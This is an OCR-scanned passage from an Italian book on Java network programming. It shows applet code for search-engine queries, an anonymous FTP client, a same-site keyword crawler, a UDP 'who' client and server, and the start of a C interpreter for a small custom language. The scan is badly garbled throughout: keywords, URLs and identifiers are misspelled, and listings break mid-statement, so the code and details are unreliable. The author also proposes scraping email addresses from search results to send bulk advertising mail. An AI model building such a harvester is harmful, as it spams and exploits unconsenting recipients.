bin/pursuit?adv=0&cat=lycos&npl=matchmode%253Dand%2526adv%253D1&query=" + tf.getText(); 

else 

if(tf.getText().length() < 1) 

s1 = "http://www.Lycos.com/"; 

if(s == "WebCrawler") 

if(tf.getText().length() > 0) 

s1 = "http://webcrawler.com/cgi-bin/WebQuery7searchTexts" + 

tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.WebCrawler.com/"; 

if(s == "Snap") 

if(tf.getText().length() > 0) 

s1 = "http://home.snap.eom/search/directory/results/1 ,61, home- 
0,00.html7category=0-0-WW&keyword=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Snap.com/"; 

if(s == "Excite") 

if(tf.getText().length() > 0) 
s1 = 

"http://search.excite.com/search.gw7traces1 &look=excite_netscape_us8sorig=netscape&search=" + tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Excite.com/"; 

if(s == "Search") 

if(tf.getText().length() > 0) 

s1 = "http://www.search.eom/lnfoseek/1, 135,0,0200.html?QUERY=" + 

tf.getText(); 

else 

if(tf.getText().length()< 1) 

s1 = "http://www.Search.com/"; 

try 

{ 

tmpURL = newURL(s1); 

} 

catch(MalformedURLException ex) 

{ 

System.out.println("Bad URL: " + tmpURL); 

} 

applet.getAppletContext().showDocument(tmpURL, "lower"); 

} 




Questa parte assume un notevole interesse in quanto dalla fusione di tre moduli 
presenti in questo programma potrebbero nascere delle idee interessanti. 
Ad esempio un' altra funzione che vedremo e' una che permette di analizzare delle 
strutture di pagine HTML indicando quelle che contengono parole o frasi specificate. 
Programmando questo modulo in modo tale che I' analisi la faccia su pagine ritornate 
dai motori di ricerca su indicati si potrebbe creare un programma che invia 
automaticamente una mail a tutti gli indirizzi email trovati sulle pagine restituite dai 
motori di ricerca contenenti argomenti da noi richiesti. 

Ad esempio potrei richiedere ad Altavista un elenco delle pagine legate alle 
gioiellerie. 
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Analizzando queste potrei trovare le mailto: specificate e utilizzare queste per inviare 
dei messaggi standard (ad esempio pubblicitari ... non bastavano i bombardamenti di 
depliant pubblicitari nella buca delle lettere !). 

Vediamo ora un'altra parte del programma che utilizza una classe legata al protocollo 
FTP. 

Tale classe e' presente nel package sun.net.ftp. Notate che in sun.net esistono anche 
le classi per la gestione di protocolli come ad esempio nntp che si interessa della 
gestione dei news groups. 

Se non si trova documentazione il modo più' semplice e' quello di far installare al 
sistema di sviluppo i sorgenti delle classi e ... buon divertimento ! 
Il modulo crea una maschera sulla quale viene richiesto I' indirizzo FTP da utilizzare 
per la connessione. 

Altri campi si interesseranno di accettare il nome della directory in cui andare e il 
nome del programma da prelevare. 

• Parte 7 file javaCenter.java 

class javaCenterFTP extends Panel implements ActionLlstener 
{ 

private TextFleld server = nuli; 
private TextField directory = nuli; 
private TextField f File = nuli; 
private TextArea IsMessage = nuli; 
private Button bServer; 
private Button download; 
private Button chDir; 

private FtpCIient fcAluFtp=new FtpClient(); 
private TelnetlnputStream tisList=null; 
private TelnetlnputStream tisGet=null; 
private TelnetOutputStream tosPut=null; 

public javaCenterFTP(String ftpServer) 

{ 

super(); 

GridBagConstraints constraints = new GridBagConstraints(); 

javaCenterConstrainer constrainer = new javaCenterConstrainer(this, constraints); 
constrainer.getDefaultConstraints().insets = new lnsets(5, 5, 5, 5); 

GridBagLayout gridbag = new GridBagLayout(); 
setLayout(gridbag); 

Label strTmp = new Label("Server :"); 

constrainer.constrain(strTmp, 0, 5, 11, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

server = new TextField(ftpServer, 40); 

constrainer.constrain(server, 11, 5, 40, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(server); 

bServer = new Button("Connetti"); 

constrainer.constrain(bServer, 51, 5, 10, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(bServer); 

strTmp = new Label("Directory:"); 

constrainer.constrain(strTmp, 0, 6, 11, 1,1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

directory = new TextField("/pub", 40); 

constrainer.constrain(directory, 11, 6, 40, 1, 1, 0, GridBagConstraints.BOTH, 
GridBagConstraints.WEST); 

add(directory); 

ChDir = new Button("CHDIR"); 

constrainer.constrain(chDir, 51, 6, 10, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(chDir); 

strTmp = new Label("File :"); 

constrainer.constrain(strTmp, 0, 7, 11, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

fFile = new TextFieldf", 40); 

constrainer.constrain(fFile, 11, 7, 40, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(fFile); 

download = new Button("Preleva"); 

constrainer.constrain(download, 51, 7, 10, 1, 1, 0, GridBagConstraints.BOTH, 
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add(download); 

strTmp = new Label("Output"); 

constrainer.constrain(strTmp, 0, 9, 8, 1, 1, 0, GridBagConstraints.BOTH, GridBagConstraints.WEST); 
add(strTmp); 

IsMessage = new TextArea(10, 80); 

constrainer.constrain(lsMessage, 0, 10, 80, 10, 1, 0, GridBagConstraints.BOTH, 
GridBagConstraints.WEST); 

add(lsMessage); 

lsMessage.appendText(" Attesa per connessione ..."); 

bServer.addActionListener(this); 
chDir.addActionListener(this); 
download. addActionListener(this); 



private void openFtpServer(String ftpServer){ 
try{ 

if(fcAluFtp.serverlsOpen()) 

fcAlu Ftp.closeServer() ; 

fcAlu Ftp.openServer(ftpServer) ; 

IsMessage.appendText(fcAluFtp.getResponseStringO); 

fcAluFtp.login("anonymous","f lavio@bernardotti.al.it"); 

IsMessage.appendText(fcAluFtp.getResponseStringO); 

fcAluFtp.binaryO; 

IsMessage.appendText(fcAluFtp.getResponseStringO); 
} catch (java.io.lOException e){ 

lsMessage.appendText("Error: "+e.getMessage()); 

} 

lsMessage.appendText("\r\n"); 



private void chDir(String cdDirectory) { 
try{ 

if (!fcAluFtp.serverlsOpen()){ 

lsMessage.appendText("Errore: Il serve non e' aperto"); 

return; 

} 

fcAluFtp.cd(cdDirectory); 

IsMessage.appendText(fcAluFtp.getResponseStringO); 
} catch (java.io.lOException e){ 

lsMessage.appendText("Error: "+e.getMessage()); 

} 

lsMessage.appendText("\r\n"); 



private void ls() 
{ 

int i; 

byte inBytes[]=new byte[1024]; 
try{ 

if (!fcAluFtp.serverlsOpen()){ 

lsMessage.appendText("Errore: Il serve non e' aperto"); 

return; 

} 

tisList=fcAluFtp.list(); 

IsMessage.appendTextffcAluFtp.getResponseSfringO); 
while((i=tisList.read(inBytes))!=-1) 
lsMessage.appendText(new String(inBytes,0)); 
} catch (java.io.lOException e){ 

lsMessage.appendText("Error: "+e.getMessage()); 

} 

lsMessage.appendText("\r\n"); 



private void getFile(String getRemoteFile){ 
FileOutputStream fos; 
int i; 

byte inBytes[]=new byte[1024]; 
try{ 

if (!fcAluFtp.serverlsOpen()){ 

lsMessage.appendText("Errore: Il serve non e' aperto"); 

return; 

} 

if (getRemoteFile == ""){ 

lsMessage.appendText("Errore: Omesso il nome del file"); 

return; 

} 

tisGet=fcAluFtp.get(getRemoteFile); 
IsMessage.appendText(fcAluFtp.getResponseStringO); 
fos=new FileOutputStream(new File(getRemoteFile)); 
while((i=tisGet.read(inBytes))!=-1) 
fos.write(inBytes); 
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fos.close(); 

IsMessage.appendTextf'™ OK ---"); 
} catch (java.io.lOException e){ 

lsMessage.appendText("Error: "+e.getMessage()); 

} 

lsMessage.appendText("\r\n"); 

} 

private void closeFtpServer(){ 
try{ 

if (!fcAluFtp.serverlsOpen()) 

return; 
fcAlu Ftp.closeServer() ; 
} catch (java.io.lOException e){ 

lsMessage.appendText("Errore: "+e.getMessage()); 

} 

} 

public void actionPerformed(ActionEvent e) 

< 

String selected = e.getActionCommand(); 
if(selected.equals("CHDIR")) { 

chDir(directory.getText()); 

ls(); 

} else 

if(selected.equals("Connetti")) { 

openFtpServer(server.getText()); 
ls(); 

} else 

if(selected.equals("Preleva")) 

getFile(fFile.getText()); 

. ' 

I metodi appena visti utilizzano quelli della classe sun.net.ftp per eseguire la 
connessione al server FTP, per eseguire la navigazione sulle directory del sistema e 
per prelevare i files. 

Come potete vedere a seguito di una richiesta di cambio directory viene eseguita 
anche una DIR (Is) in modo tale da mostrare i contenuti del nuovo posizionamento. 
Avrete notato che I' output ricevuto tramite uno stream TELNET viene visualizzato 
dentro ad una TextArea ovvero ad un campo di edit multiriga che viene adibito, nel 
programma, a maschera di visualizzazione dei dati che giungono dall' host a cui si e' 
connessi. 

II programma utilizza sempre il LOGIN "anonymous" e la mia EMAIL come password 
in quanto si suppone che ci si voglia connettere a sistemi pubblici che normalmente si 
attengono a questo sistema. 

Se vi interessa effettuare il login su host con LOGIN, e quindi PASSWORD, dedicate 
potete modificare il programma aggiungendo alla maschera di inserimento dei dati 
anche il campo per contenere il primo dato e un altro per contenerci la password. 

fcAluFtp.login("anonymous","flavio@bernardotti. al.it"); 




1 
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Il precedente codice dovrà' essere modificato in modo tale che gli argomenti 
diventino quelli letti dai campi aggiunti. 

Per gestire un flusso di dati si in input che in output viene utilizzato uno stream 
Telnet. 

Uno stream Telnet può' essere ottenuto utilizzando le apposite classi sun.net. 

Difatti sono presenti le classi TelnetOutputStream e TelnetlnputStream per gestire 

flussi di dati. 

La classe FTP dispone inoltre di metodi per settare le comunicazioni in modo ascii o 
binario. 

L' ultima parte del programma permette di creare una connessione ad un URL 
specificata mediante I' argomento firstpage nel modulo HTML e di creare un elenco di 
pagine ricavate dall' analisi alla ricerca delle parole o delle frasi specificate. 



A partire dalla pagina specificata viene ripercorso tutto I' albero sottostante delle 
pagine HTML. 

• Parte 8 file javaCenter.java 

class javaCenterSHost extends Panel implements ActionLlstener, ItemListener, Runnable 
{ 

private Int hlts = 0; 

private int maxhits = 40; 

private String indexpage = new String(); 

private String criteria; 

private URL baseurl = nuli; 

private Thread th = nuli; 

private Checkbox checkboxl ; 

private Checkbox checkbox2; 

private Checkbox checkbox3; 

private TextField textfieldl ; 

private Vector allUrls = new Vector(); 

private Button buttonl ; 

private java.awt.List tmpLista; 

private Applet applet; 

private TextArea messaggi; 

public javaCenterSHost(String m firstpage, Applet applet) 

{ 

super() ; 

this.applet = applet; 

baseurl = applet. getDocumentBase(); 

setLayout(new BorderLayoutO); 

indexpage = m_firstpage; 

Panel panel = new Panelf); 

panel.setLayout(new FlowLayout(FlowLayout. CENTER)); 

Label strTmp = new Label("Riporta pagine con"); 

criteria = "qualsiasi parola"; 

checkboxl = new Checkboxf'qualsiasi parola"); 
checkboxl .setFont(new Fontf'Dialog", 0, 10)); 
checkbox2 = new Checkboxf'tutte le parole"); 
checkbox2.setFont(new Font("Dialog", 0, 10)); 
checkbox3 = new Checkboxf'frasi"); 
checkbox3.setFont(new Fontf'Dialog", 0, 10)); 
checkboxl .setstate(true); 

checkboxl .addltemListener(this); 
checkbox2.addltemListener(this); 
checkbox3.addltemListener(this); 

panel.add(strTmp); 
panel .add(checkbox1 ) ; 
panel. add(checkbox2); 
panel .add(checkbox3) ; 

add(panel, "North"); 

panel = new Panel(); 

panel.setLayout(new FlowLayout(FlowLayout. CENTER)); 
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strTmp = new Label("Parole (separate da virgole) :"); 
textfieldl = new TextField("", 40); 
buttonl = new Button("Cerca"); 

panel.add(strTmp); 
panel. add(textfield1 ); 
panel. add(buttonl); 

add(panel, "Center"); 

buttonl. addActlonLlstener(this); 

panel = new PanelQ; 
panel.setLayout(new GridLayout(2,1)); 

tmpLlsta = new java.awt.List(7, false); 
tmpLista.setForeground(new Color(0,255,0)); 
tmpLlsta.setBackground(new Color(0,60,0)); 
tmpLlsta.addltemLlstener(thls); 

messaggi = new TextArea(5, 30); 

panel. add(tmpLista); 
panel. add(messaggi); 

tmpLista.addltemListener(this); 

add(panel, "South"); 

} 

public void stop() 
{ 

th = nuli; 

} 

public void run() 
{ 

register(indexpage ); 

Search(textfield1.getText() , criteria , indexpage ); 
stopThread(); 

} 



public void startThread() 

{ 

if( th != nuli ){ 

th.stop(); 
th = nuli; 

} 

th = new Thread( this ); 
th.start(); 

} 

public void stopThread() 
{ 

buttonl. setLabel( "Cerca" ); 

messaggi.appendText("Nessuna altra pagina trovata\r\n"); 
messaggi.appendText("Eseguite un doppio click su un eventuale uri trovato\r\n"); 

if( th != nuli ) 

{ 

try{ th.stop(); }catch( Exception e ){} 
th = nuli; 

} 

} 

void Search( String search, String criteria, String uri ) 
{ 

String content = ""; 
try< 

content = readURL( uri ); 
} catch( Exception e ) { return; } 

Enumeration links = parseLinks( content ); 

messaggi.appendText("Ricerca su " + uri + " di " + search + " (" + criteria + ">r\n"); 

if(criteria.equalslgnoreCase( "qualsiasi parola" ) && matchAny( search, content ) ) 
report( uri ); 

else 

if( criteria. equalslgnoreCase( "tutte le parole" ) && matchAII( search, content ) ) 
report( uri ); 
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else 

if( criteria.equalslgnoreCase( "frasi" ) && matchPhrase( search, content ) ) 
report( uri ); 

whlle( links. hasMoreElementsQ ) 

Search( search, criteria, (String)links.nextElement() ); 

} 

boolean matchAny( String search, String content ) 
{ 

String s = search.toLowerCase(); 
String c = content.toLowerCase(); 

StringTokenizer tok = new StringTokenizer( s , ", " , false ); 
while( tok.hasMoreTokens() ){ 

if( c.indexOf( tok.nextToken() ) !=-1 ) 
return true; 

} 

return false; 

} 

boolean matchAII( String search, String content ) 
{ 

String s = search.toLowerCase(); 
String c = content.toLowerCase(); 

StringTokenizer tok = new StringTokenizer( s , ", " , false ); 
int count = tok.countTokens(); 

while( tok.hasMoreTokens()) 
if( c.indexOf( tok.nextToken() ) !=-1 ) 
count-; 

return( count == 0 ); 

} 

boolean matchPhrase( String search, String content ) 

{ 

String s = search.toLowerCase().trim(); 
String c = content.toLowerCase(); 

if( c.indexOf( s ) != -1 ) 
return true; 

else 

return false; 



void report( String uri ) 
{ 

try{ 

URL u = new URL( baseurl , uri ); 
tmpLista.addltem( u.toStringO ); 

this.hits++; 

if( this.hits >= this.maxhits ) 
stopThread(); 
} catch( Exception e ){} 

} 

Enumeration parseLinks( String content ) 

{ 

String searchfor[] = { " href" , " src" }; 
String delim = ""; 

String look = content.toLowerCaseQ; 
Vector foundurls = new Vector(); 
int i, j , k, chh, chi2; 
String tmp = ""; 

k = 0; 

while( k < searchfor.length ) { 
i = Ì = 0; 

delim = searchfor[ k ]; 
try{ 

while( ( j = look.indexOf( delim , j )) !=-1 ) { 

for( i = ( j + delim.length() ) ; ( look.charAt( i ) == " Il look.charAt( i )=='=' || 
look.charAt( i ) == V" ) && i < look.lengthf); i++ ); 

chh = content. indexOf( " " , i ); 

Chi2 = content. indexOf( 'V'" , i ); 
if( chh < 0 ) chi1 = 0; 
if( chi2 < 0 ) Chi2 = 0; 

tmp = content.substring( i , Math.min( Math.min( chh , content. lengthQ 

) , Math.min( chi2 , content. lengthQ ))); 

if( checkURL( tmp ) ) { 

messaggi.appendText("Ricerco links " + tmp + "\r\n"); 
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foundurls.addElementf tmp ); 

} 

j = i; 

} 

}catch( StringlndexOutOfBoundsException strbx ){} 
k++; 

} 

return foundurls.elements(); 



private boolean checkURLf String ustr ) 

{ 

try{ 

if( isRegistred( ustr ) ) 
return false; 

URL turi = new URL( applet.getDocumentBase() , ustr ); 

if(!turl.getHost().equalslgnoreCase( baseurl.getHost())) 
return false; 

if( ustr.charAt( 0 ) == '#' ) 
return false; 

if( ! checkSuffix( ustr ) ) 
return false; 
} catch( Exceptlon uex ) { return false; } 

register( ustr ); 

return true; 



} 



private void register( String ustr ) 

{ 

if(ustr.indexOf( "#")!= -1) 

allUrls.addElement( cleanLink(ustr)); 
allUrls.addElement( ustr ); 

} 

boolean isRegistred( String ustr ) 
{ 

return( allUrls.contains( cleanLink( ustr) ) ); 

} 



boolean checkSuffix( String uri ) 
{ 

String ustr = ""; 

if( url.indexOf( "#" ) != -1 || url.indexOf( "?" ) != -1 ) 
ustr = cleanLinkf uri ); 

else 

ustr = uri; 
ustr = ustr.toLowerCase(); 

if(!(ustr.endsWith( ".html" ) || ustr.endsWith( ".htm" ) || 

ustr.endsWith( ".txt" ) || ustr.endsWith( ".java" )|| 
ustr.endsWith( ".asp" ) || ustr.endsWith( ".pi" ) jj 
ustr.endsWith( ".cgi" ) || ustr.endsWith( ".shtml" ))) { 
return false; 

} 

return true; 



} 

String cleanLinkf String uri ) 
{ 

if( url.indexOf( "#" ) != -1 ) 

return url.substring( 0 , url.indexOf( "#" ) ); 

else 

if( url.indexOf( "?" ) != -1 ) 

return url.substring( 0 , url.indexOf( "?" ) ); 

return uri; 

} 

String readURLf String filename ) throws java.lang.Exception 

{ 

DatalnputStream is = nuli; 
URLfilepath = nuli; 
String filecontents = ""; 
String line = ""; 

filepath = new URL( applet.getDocumentBase() , filename ); 
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is = new DatalnputStream( new BufferedlnputStream( filepath.openStreamQ ) ); 
while( true ) { 

line = is.readLine(); 

if( line == nuli ) 
break; 

filecontents += line; 

} 

is.close(); 

return filecontents; 



String skipspace( String str ) 
{ 

int i = 0; 

StringBuffer nstr = new StringBufferQ; 

while( i < str.length() ) { 

if( str.charAt( i ) != " ) 

nstr.append( str.charAt( i ) ); 

i++; 

} 

return nstr.toStringQ; 



public void actionPerformed(ActionEvent ev) 

{ 

String selection = ev.getActionCommand(); 

if(selection.equals("Cerca")) { 

if(skipspace(textf ieldl .getText() ).equals("")) 
return; 

tmpLista.removeAIIQ; 
allUrls.removeAIIEIementsO; 
buttonl .setLabel("Stop"); 
startThread(); 

stopThread(); 



} else 



} 



public void itemStateChanged(ltemEvent e) 

{ 

Object item = e.getSource(); 
if(item == tmpLista) { 
try{ 

applet.getAppletContext().showDocument( new URL( tmpLista. getSelectedltem() ) 



_blank" ); 

} else 



} catch( Exception ex ){} 

iffitem == checkboxl ) { 

checkbox2.setState( false ); 
checkbox3.setState( false ); 

messaggi.appendText("Settato criterio a QUALSIASI PAROLA\r\n"); 
criteria = checkboxl .getLabel().toLowerCase(); 



} else 



if(item == checkbox2 ) { 

checkboxl .setState( false ); 
checkbox3.setState( false ); 
criteria = checkbox2.getLabel().toLowerCase(); 
messaggi.appendText("Settato criterio a TUTTE LE PAROLBr\n"); 



} else 



if(item == checkbox3 ) { 

checkboxl .setState( false ); 
checkbox2.setState( false ); 
criteria = checkbox3.getLabel().toLowerCase(); 
messaggi.appendText("Settato criterio a FRASMn"); 



L' esempio visto ' costituito da 8 pezzi. 

Dato che nella versione 1 .2 del JDK e' stata inserita un' altra classe List la 

dichirazione List del AWT creava un errore di ambiguità'. 

Per sopperire al problema la dichiarazione, dove serve e' stata fatta con : 

java.awt.List lista = new java. awt.List(10, false); 
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L' applet può' essere compilato sia con il 
compilatore Microsoft 1 .12 (anche con la 6.0). 



JDK 1.1 (o con 1.2) oppure con il 



GESTIONE ECCEZIONI 



Nelle argomentazioni viste precedentemente abbiamo utilizzato I' intercettazione 
delle eccezioni che potevano essere generate dall' utilizzo delle varie classi. 
Vediamo ora di approfondire il discorso in quanto I' argomento ricopre un ruolo molto 
importante. 

Avevamo accennato, parlando delle URL, ad un eccezione che veniva generato nel 
caso in cui si verificava I' impossibilita' di accedere, per problemi di errata definizione 
del formato, ad una risorsa. 

L' eccezione in questione era la MalformedURLException. 

Nei package in cui sono presenti le classi viste sono definite altre eccezioni che ci 
risultano utili per I' identificazione degli inconvenienti legati all' uso di questi 
packages. 

Vediamone un elenco con a fianco i significati : 



ECCEZIONE 



CAUSA 



BindException 

ConnectException 

MalformedURLException 

NoRouteToHostException 

Protocol Exception 

SocketException 

UnknownHostException 



Dovuto all' impossibilita' (porta già' in uso) di collegare il socket 
Rifiuto della connessione da parte del socket remoto 
Interpretazione errata del URL 

Blocco da parte di un firewall. Impossibilita' di raggiungere I' host. 
Errore nel protocollo del socket 
Eccezione del socket 
Errore di risoluzione del nome host. 



Nel package sun.net invece ritroviamo le seguenti eccezioni 



ECCEZIONE 



CAUSA 



TelNetProtocol Exception 
SmtpProtocol Exception 
FtpLoginException 
FtpProtocol Exception 
NntpProtocolException 



Errore del protocollo telnet 

Errore nel protocollo smtp 
Errore accedendo al server FTP 
Errore del protocollo FTP 

Errore del protocollo Nntp 



Inizialmente, quando parlavamo della struttura della rete, avevamo visto 
definizione del protocollo UDP e avevamo anche detto che esisteva una serie 
classi che erano apposite per tale protocollo. 
Si trattava delle classi per i datagrammi. 



la 
di 



Inizialmente avevamo detto che i datagrammi vengono utilizzati per inviare in modo 
indipendente dei pacchetti di dati da un applicazione ad un'altra senza garantirne I' 
arrivo. 

I pacchetti di dati inviati tramite datagrammi in genere sono indipendenti. 

Per fare un esempio pratico vediamo due moduli, uno per il server e uno per il client, 
che permettono di inviare le informazioni degli utenti collegati ad un sistema Unix. 
Supponiamo che esista un programma che a tempi regolari esegua un who 
(istruzione Unix per vedere I' elenco degli utenti collegati al sistema) e che scriva i 
dati in un file denominato users.txt. 

II programma server dovrà' attendere una richiesta di invio di un datagramma da 
parte di un software client e dovrà' inviare il contenuto del file. 



t java.io.*; 
t java.net.*; 
import java.util.*; 



public class whoClient { 
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public static void main(String[] args) throws lOException { 
if (args.length != 1) { 

System.out.println("Usage: java whoClient <hostname>"); 
return; 

} 

// Crea il datagramma 

DatagramSocket socket = new DatagramSocket(); 
byte[] buffer = new byte[512]; 

InetAddress address = lnefAddress.getByName(args[0]); 
// Invia la richiesta 

DatagramPacket packet = new DatagramPacket(buffer, buffer.length, address, 5225); 

socket.send(packet); 

// Prende la risposta 

packet = new DatagramPacket(buffer, buffer.length); 

socket.receive(packet); 

// Lo visualizza i dati ricevuti 

String received = new String(packet.getData(), 0); 

System.out.println("User(s) connected: " + received); 

socket.closeO; 

} 

} 

Vediamo ora il software del server. 

import java.io.*; 
import java.net.*; 
import java.util.*; 

public class whoServerThread extends Thread { 

protected DatagramSocket socket = nuli; 
protected BufferedReader in = nuli; 
protected boolean flag = true; 

public whoServerThread() throws lOException { 
this("WhoServerThread"); 

} 

public whoServerThread(String name) throws lOException { 
super(name); 

socket = new DatagramSocket(5225); 
try{ 

in = new BufferedReader(new FileReaderf'users.txt")); 
} catch (FileNotFoundException e) { 

System.err.println("Could not open who file. "); 

} 

} 

public void run() { 

byte[] buf = new byte[256]; 
String returnValue; 

while (returnValue = in.readLineQ) != nuli) { 
try{ 

// Riceve la richiesta 
DatagramPacket packet = new DatagramPacket(buf, buf.length); 
socket.receive(packet); 

buff = returnValue.getBytes(); 

// send the response to the client at "address" and "port" 
InetAddress address = packet.getAddress(); 
int port = packet.getPort(); 

packet = new DatagramPacket(buf, buf.length, address, port); 

socket.send(packet); 

} catch (lOException e) { 

e.printStackTrace(); 

} 

} 

socket.closeO; 
in.close(); 

} 

} 

Con la versione 1.2 del JDK i packages legati alla gestione della rete sono 
ulteriormente aumentati facendo diventare il numero dei metodi a disposizione una 
cosa enorme. 

Veramente un infinita' di metodi sufficenti a perdersi dentro. 

A peggiorare la situazione ci sono anche le classi create da programmatori e 
software house che invadono il mercato sia shareware che commerciale. 
Sun esce con la versione 1.2 ed aggiunge le classi Swing e JFC ... Microsoft arriva 
con la sua 3.0 e inserisce AFC. 

Ogni botta sono centinaia di metodi che si aggiungono a quelli già' esistenti. 
Senza contare che quello che oggi e' recentissimo domani e' sorpassatissimo. 
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Con Java e' proprio il caso di dire : "... chi vivrà' vedrà' !" 
Crearsi il proprio linguaggio 

Molte volte durante la mia carriera professionale mi sono trovato dinanzi a problematiche che 
evolvevano, si modificavano e spesso cambiavano radicalmente. 

Altre volte si capiva già in partenza che quel tipo di problematiche avrei potuto ritrovarle altre 
volte. 

Per fare un esempio pratico. 

Anni fa ricevetti una commessa da Telecom (allora SIP) la quale aveva questo problema. 
La gestione del personale e quindi presenze, 

turni ecc., veniva fatta in tutta Italia tramite terminali che permettevano di inserire i dati dentro 
ai vari Mainframe che accentravano l'elaborazione di questi. 

Le varie agenzie quindi inserivano tutte le informazioni dentro ai sistemi 3090 tramite questi 
terminali 3270 su reti IBM SNA e non potevano fare nessuna elaborazione locale delle 
informazioni. 

La soluzione per permettere di disporre localmente delle informazioni sarebbe stata quella di 
poter accedere agli archivi del 3090 IBM, 

cosa impossibile in quanto il centro di calcolo non dava questa disponibilit..., anzi trattava i 
suoi dati come se fossero TOP SECRET. 

Allora le soluzioni alternative sarebbero state quelle di digitare due volte i dati, una volta per 
inserirli nel database locale e un altra volta per metterli nel mainframe. 
La terza soluzione era quella di inserire i dati in una procedura locale e poi questa simulando 
un operatore andava a mettere dentro ai campi delle procedure del mainframe le stesse 
informazioni usufruendo di funzioni delle API 3270 per reti SNA. 

In pratica non potendo accedere agli archivi del mainframe e quindi non potendo fare delle 
semplici INSERT il software prendeva i dati dal DB locale e li inseriva nel buffer di tastiera 
simulando gli spostamenti da campo in campo dell'applicativo 3090. 

Tutte le procedure SIP (Telecom) in genere giravano su sistemi remoti legati ai vari centri di 
calcolo e quindi quella di poter scrivere "operatori automatici" sarebbe potuta 
essere un tipo di applicazioni ricorrenti per vari scopi in Telecom. 

Invece di scrivere una procedura in questo caso conveniva scrivere un linguaggio che 
gestisse : 

• database locali 

• funzioni di gestione hardware (interrupt e accessi a memoria) 

• funzioni API 3270 per la gestione delle reti SNA. 

Scrivendo un linguaggio che gestisse queste problematiche si sarebe facilmente potuto 
scrivere altre applicazioni per questo tipo di architetture. 

Comunque questo era solo un esempio in quanto la scrittura di piccoli linguaggi diventa utile 
per tutti quei casi in cui ci sono problemi ricorrenti. 
Che cosa significa scriversi un linguaggio dedicato ? 

Chiaramente parliamo di strutture semplici senza andare in complicazioni particolari. 
Scriversi un linguaggio orientato significa analizzare i vari problemi che questo deve risolvere 
e scriversi una tabella sintattica e semantica che descriva le strutture di questo linguaggio. 
Un linguaggio è inanzi tutto composto da vocaboli che possiamo definire con il termine di 
TOKEN i quali possono essere combinati secondo certe regole semantiche. 
Prendiamo un operazione di selezione delle informazioni da database. 
Il token sarà SELEZIONA il quale potrà essere seguito da un nome di un campo oppure da 
un carattere * atto a indicare che si vogliono estrarre tutti i campi. 

Se il termine dopo SELEZIONA è * allora il token successivo può essere solo il nome del 
DATABASE da cui si vogliono estrarre le informazioni. 

(1) Nel caso in cui sia un campo di database il token dopo può essere una virgola (,) a 
separazione oppure il nome del database. 

Nel caso che sia una virgola si estrae un altro token e si ricomincia la valutazione dal punto 



Quindi le cose da fare per scriversi un linguaggetto sono : 
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Scriversi il flusso del linguaggio in base ai vari costrutti 

Scriversi un programma che carichi tutto il programma in un buffer e che possieda 
una funzione che estrae un TOKEN alla volta (GetToken). 

Scriversi le varie funzionalità' che devono essere eseguite quando si arriva ad interepratre 
una certa cosa. 

Supponiamo di avere un costrutto del linguaggio che è: 



Chiamiamo GetToken il quale ci restituisce SCRIVIAVIDEO. 

Capiamo che si tratta di una funzione che deve scrivere la stringa successiva a video. 
Richiamiamo GetToken il quale ci restituisce la stringa. 

A questo punto chiamiamo un funzione che stampa a video alla quale passeremo come 
argomento il secondo token. 

Il nostro linguaggio dovrà possedere anche un analizzatore metematico a cui passare 
funzioni del tipo : 

SCRIVIAVIDEO 34*25+2-1 



Questa parte di sorgente incorpora il parser matematico. 

L'ultima funzione in basso entry() legge ciclicamente un funzione e ne stampa il risultato. 
Vi chiederete del perché di tutto questo discorso. 

L'obbiettivo che mi voglio mettere in questo capitolo è legato al fatto di riuscire a fornire un 
qualche cosa che si evolverà con voi mese dopo mese e anno dopo anno fino a diventare il 
vostro sistema di raccolta delle funzionalità di rete. 

Dicevamo prima che il primo step che si deve eseguire è quello di creare una sintassi del 
linguaggio. 

Partiamo dall'idea che il nostro linguaggio dovrà possedere : 
DATI 

FUNZIONI 

Tra i dati ci dovrà essere la possibilità di gestire i tipi fondamentali e il più alcuni tipi legati alle 
strutture di base legate al TCP/IP. 

Decidiamo che l'identificazione del tipo viene fatto tramite il carattere prima del nome della 
variabile 

INOMEVARIABILE = La variabile è numerica 

$NOMEVARI ABILE = La variabile è stringa 

L'ultima funzione in basso entry() legge ciclicamente un funzione e ne stampa il risultato. 



char 


far buffer [16384] ; 




#define 


ERROR 


0 


#define 


DELIMITER 


1 


#define 


VARIABLE 


2 


#define 


NUMBER 


3 


#define 


INSTRUCTION 


é 


#define 


LABEL 


5 


#define 


COUNTER 


6 


#define 


FINISHED 


7 


#define 


INSTR_SE 


0 


#define 


INSTR_INIZIOSE 




#define 


INS TR_FINESE 


2 


#define 


INSTR_ALTRIMENTI 


3 


#define 


INSTR_ESEGUI 


4 


#define 


INSTR_VAIA 


5 


#define 


INSTR STAMPA 


6 
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char *funcstr[] = { 




"IF", 




"BEGIN" , 




"END", 




"ELSE", 




"RUN", 




"GOTO", 




"PRINT" , 

ff ff 




}; 




static struct label { 




char labname [12] ; 




char *prgptr; 




} Ibi [50]; 




static int numlabel = 0; 




char *prog; 




char token[80] ; 




int tok_type; 




int tok_istr; 




void levell (float *) ; 




void serror (int i) 




{ 




printf C \nError : %d" , I) ; 




} 




float vars[26] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 


0, 0, 0, 0, 0, 0, 0, 


0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; 




static int is_in(char eh, char *s) 




{ 




while (*s) 




if (*s++==ch) 




return 1; 




return 0; 




} 




static int isdelim (char c) 




{ 




if(is_in(c, " +-*/%*=()") Il c == 9 II c == 


' \r' Il c == 0) 


return 1; 




return 0; 




} 




static void searchfunction (void) 




{ 




register i = 0; 




while (funcstr [i] ) ( 




if ( ! lstrcmp (token, funcstr [i] ) ) { 




tok_istr = i; 




return; 




} 




++i; 




} 




tok_istr = ERROR; 




ì 




static void get_token (void) 




{ 




register char *temp; 
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temp = token; 

while (Isspace (*prog) ) 

++prog; 
if(*prog == '\0') { 

tok_type = FINISHED; 

return; 

